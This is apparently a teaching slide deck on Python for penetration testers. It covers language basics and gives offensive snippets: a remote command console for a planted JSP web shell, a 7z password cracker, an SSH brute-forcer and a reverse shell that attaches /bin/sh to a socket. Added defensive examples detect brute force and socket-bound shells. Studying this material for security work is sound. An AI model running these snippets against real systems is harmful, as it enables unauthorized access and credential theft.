Python for Penetration testers


Quick presentation on how a penetration tester can start using Python to automate many of the tasks, create new tools, etc. For my colleagues.

Published in Technology

  • 1. Why?
      • EASY (install, learn, code)
      • Tons of libraries
      • Code is easy to understand
      • Multiplatform
      • Good for prototyping
  • 2. History
      • Conceived in the late 1980s, first implementation in 1989
      • Created by Guido van Rossum
      • Benevolent Dictator for Life
      • Actually there are two branches: 2.x and 3.0
  • 3. Python 101
      • Interpreted language
      • Object oriented
      • Indentation is significant in Python: it is the block delimiter
      • Usual control structures (if, while, etc.)
      • Multiple levels of organization (functions, classes, modules, packages)
  • 4. Who is using Python?
      • Core Impact
      • ImmunityDebugger
      • Canvas
      • Peach
      • W3AF
      • Sulley
      • Sqlmap
      • Paimei
      • Impacket
      • Scapy
      • Google
      • Spike Proxy
  • 5. Python 101: Data types
      • Strings - "Hello"
      • Numbers - 123
      • Lists - ['hello', '2', '1']
      • Tuples - ('1', '2', '3') (immutable)
      • Dictionaries - d = {'key1': 'dog', 'key2': 'cat'}
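  • 6. Python 101: Structures

        list = [1, 2, 3, 4, 5]
        for x in list:
            print x

        # x keeps its last value from the loop above (5);
        # str() is needed to concatenate a number to a string
        if 3 > x:
            print "3 is bigger than " + str(x)
        else:
            print "3 is smaller than " + str(x)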
  • 7. Python 101: Example

    Hello World:

        print "Hello World"

    With variables:

        msg = "Hello World"
        print msg
  • 8. Python 101
      • Interactive Python shell
      • The commands execute line by line as you type
      • Good for testing small pieces of code such as loops, regex, etc.
      • Type "python" and press Enter to access the shell
  • 9. Python 101
      • String indexes start counting at 0 and can also be negative
      • msg[0] is H
      • msg[-1] is d
  • 10. Basic Code bits

        import sys

        ofile = "names.txt"
        # open for reading; mode 'w' would truncate the file before readlines()
        fil = open(ofile, 'r')
        x = fil.readlines()
        for y in x:
            print y
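  • 11. Urllib2
      • Library to deal with HTTP

        import urllib2

        # placeholder: the URL is missing from the slide text
        url = "http://example.com/"
        response = urllib2.urlopen(url)
        html = response.read()
        print html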
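  • 12. Basic fuzzer

        import sys, urllib2

        ofile = "dirs.txt"
        # open the wordlist for reading; mode 'w' would empty it
        fil = open(ofile, 'r')
        dirs = fil.readlines()
        # placeholder: the base URL is missing from the slide text
        base_url = "http://example.com/"
        for x in dirs:
            # strip the trailing newline that readlines() keeps
            response = urllib2.urlopen(base_url + x.strip())
            html = response.read()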
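  • 13. Encoding

        import base64
        string = "TEST"
        base64.standard_b64encode(string)
        # VEVTVA==

        import hashlib
        # this call is lost in the slide text; MD5 matches the digest shown below
        m = hashlib.new('md5')
        m.update(string)
        res = m.hexdigest()
        print res
        # 033bd94b1168d7e4f0d644c3c95e35bf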
  • 14. Generic Console for Web Remote Execution

        import httplib, urllib, sys

        host = "XXXXXXXXXX"
        while 1:
            cmd = raw_input("Exploited@" + host + "#>")
            if cmd == "exit":
                sys.exit()
            else:
                h = httplib.HTTP(host)
                cmd = urllib.quote(cmd)
                print cmd
                h.putrequest('GET', "/myconsole123/my-shell.jsp?pass=1231&cmd=" + cmd)
                h.putheader('Host', host)
                h.putheader('User-agent', 'Internet Explorer 6.0 ')
                h.endheaders()
                returncode, returnmsg, headers = h.getreply()
  • 15. 7 Zip Cracker

        import os, sys, pylzma
        from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError

        pas = open('passwords.txt', 'rb')
        password = pas.readlines()
        for x in password:
            try:
                fp = open('test.7z', 'rb')
                archive = Archive7z(fp, password=x)
                print "The password is " + x
                sys.exit()
            except Exception, e:
                fp.close()
  • 16. A Web browser

        #!/usr/bin/env python
        import sys
        from PyQt4.QtCore import *
        from PyQt4.QtGui import *
        from PyQt4.QtWebKit import *

        app = QApplication(sys.argv)
        web = QWebView()
        web.load(QUrl(""))
        sys.exit(app.exec_())
  • 17. One line Webserver

        python -m SimpleHTTPServer 8080
  • 18. SSH Bruteforcer

        import paramiko

        # hostname, username and passw are set elsewhere; the slide shows only this fragment
        t = paramiko.Transport(hostname)
        try:
            t.start_client()
        except Exception:
            x = 0
        try:
            t.auth_password(username=username, password=passw)
        except Exception:
            x = 0
        if t.is_authenticated():
            print "Password found " + passw
  • 19. Proxy Strike Deflate Patch
      • pd contains the POST data in the repeat function:

        import zlib
        defla = zlib.compress(pd)
  • 20. Reverse Shell

        import socket,subprocess,os
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("",1234))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        # the start of the next line is missing from the slide text
        ["/bin/sh","-i"])
  • 21. Win32Com
      • Library that allows us to access COM objects on Win32 systems
      • We can automate Word, Excel, PowerPoint, access WMI, AD, etc.
  • 22. Massive printing

        from win32com import client
        import time

        word = client.Dispatch("Word.Application")

        def printPDFDocument(filename):
            word.Documents.Open(filename)
            word.ActiveDocument.PrintOut()
            time.sleep(5)
            word.ActiveDocument.Close()
            word.Quit()

        printPDFDocument("c:test.doc")
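  • 23. Excel Processing

        from win32com.client import Dispatch

        xlApp = Dispatch("Excel.Application")
        xlApp.Visible = 1
        # the call around "test.xls" is lost in the slide text; Workbooks.Open is the usual one
        xlApp.Workbooks.Open("test.xls")
        for x in range(1, 100):
            # read column 5 of each row
            nombre = str(xlApp.ActiveSheet.Cells(x, 5))
            print nombre
        xlApp.Quit()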
  • 24. WMI

        import wmi

        c = wmi.WMI()
        for process in c.Win32_Process():
            print process.ProcessId, process.Name
  • 25. Interesting stuff
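
Slide 18 from the defender's side, as an added example that is not part of the original deck: password guessing of that kind leaves a run of "Failed password" lines in the sshd log, and the function below flags any source address with a burst of them. It is written for Python 3 (the slides use Python 2); the log lines are constructed samples in the OpenSSH syslog format, and the threshold, window and `year` parameter (syslog timestamps carry no year) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the OpenSSH syslog format (not real log data).
SAMPLE_LOG = """\
Mar  3 09:00:10 bastion sshd[1990]: Failed password for bob from 198.51.100.9 port 51000 ssh2
Mar  3 10:15:01 bastion sshd[2001]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar  3 10:15:04 bastion sshd[2003]: Failed password for root from 203.0.113.7 port 40130 ssh2
Mar  3 10:15:08 bastion sshd[2005]: Failed password for invalid user admin from 203.0.113.7 port 40141 ssh2
Mar  3 10:15:11 bastion sshd[2007]: Failed password for invalid user test from 203.0.113.7 port 40150 ssh2
Mar  3 10:15:15 bastion sshd[2009]: Failed password for root from 203.0.113.7 port 40166 ssh2
Mar  3 10:15:19 bastion sshd[2011]: Failed password for root from 203.0.113.7 port 40171 ssh2
Mar  3 10:20:00 bastion sshd[2020]: Accepted password for alice from 192.0.2.10 port 50222 ssh2
Mar  3 11:42:30 bastion sshd[2100]: Failed password for bob from 198.51.100.9 port 51044 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {ip: max failures seen inside one window} for sources at or over threshold."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events[m["ip"]].append(ts)
    flagged = {}
    for ip, times in events.items():
        times.sort()
        start = best = 0
        for end, t in enumerate(times):      # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged
```

Two failures hours apart from the same address stay below the threshold, while six within twenty seconds are reported.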
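
Slide 19 seen from the receiving side, as an added example that is not part of the original deck: `zlib.compress()` produces a zlib-wrapped stream, while some clients send raw deflate, so anything that inspects such a POST body has to accept both and cap the output size. It is written for Python 3 and assumes the body is sent as HTTP deflate content; the function names and the 1 MiB limit are hypothetical.

```python
import zlib

def deflate_variants(body):
    """Return (zlib_wrapped, raw) encodings of the same bytes."""
    wrapped = zlib.compress(body)                 # RFC 1950: 2-byte header + Adler-32 trailer
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)   # RFC 1951: raw deflate, no header or checksum
    raw = c.compress(body) + c.flush()
    return wrapped, raw

def inflate_body(data, limit=1 << 20):
    """Decode a deflated request body for inspection.

    Tries the zlib-wrapped form first, then raw deflate, and refuses to
    produce more than `limit` bytes so a small body cannot expand without bound.
    """
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS):
        d = zlib.decompressobj(wbits)
        try:
            out = d.decompress(data, limit + 1)   # ask for one byte more than allowed
        except zlib.error:
            continue                              # wrong framing, try the next variant
        if len(out) > limit:
            raise ValueError("inflated body exceeds limit")
        return out
    raise ValueError("not a deflate stream")

# Constructed sample POST data
SAMPLE_BODY = b"user=admin&comment=" + b"A" * 200

if __name__ == "__main__":
    wrapped, raw = deflate_variants(SAMPLE_BODY)
    print(len(SAMPLE_BODY), len(wrapped), len(raw))
    print(inflate_body(wrapped) == inflate_body(raw) == SAMPLE_BODY)
```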
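
Slide 20 from the defender's side, as an added example that is not part of the original deck: the three `os.dup2()` calls leave file descriptors 0, 1 and 2 of the process pointing at one network socket, which is visible under `/proc/<pid>/fd` on Linux. It is written for Python 3; the function names and the sample fd tables are constructed for illustration.

```python
import os

def stdio_socket(fd_links):
    """Given {fd: readlink target}, return the socket name when fds 0, 1 and 2
    all point at the same socket (the result of three dup2() calls), else None."""
    targets = {fd_links.get(fd) for fd in (0, 1, 2)}
    if len(targets) == 1:
        target = targets.pop()
        if target and target.startswith("socket:["):
            return target
    return None

def read_fd_links(pid, proc="/proc"):
    """Read the stdio fd symlinks of one process; unreadable fds are skipped."""
    links = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink(os.path.join(proc, str(pid), "fd", str(fd)))
        except OSError:
            pass  # process exited, or not enough privileges to read it
    return links

def scan(proc="/proc"):
    """Return [(pid, socket)] for every process whose stdio is a single socket."""
    hits = []
    for name in os.listdir(proc):
        if name.isdigit():
            sock = stdio_socket(read_fd_links(int(name), proc))
            if sock:
                hits.append((int(name), sock))
    return hits

# Constructed examples of what /proc/<pid>/fd can contain
SHELL_ON_TTY = {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}
SHELL_ON_SOCKET = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}
DAEMON = {0: "/dev/null", 1: "socket:[1200]", 2: "socket:[1200]"}

if __name__ == "__main__":
    for pid, sock in scan():
        print(pid, sock)
```

inetd-style and socket-activated services also run with stdio on a socket, so a hit is a lead to check against the process name and parent, not a verdict.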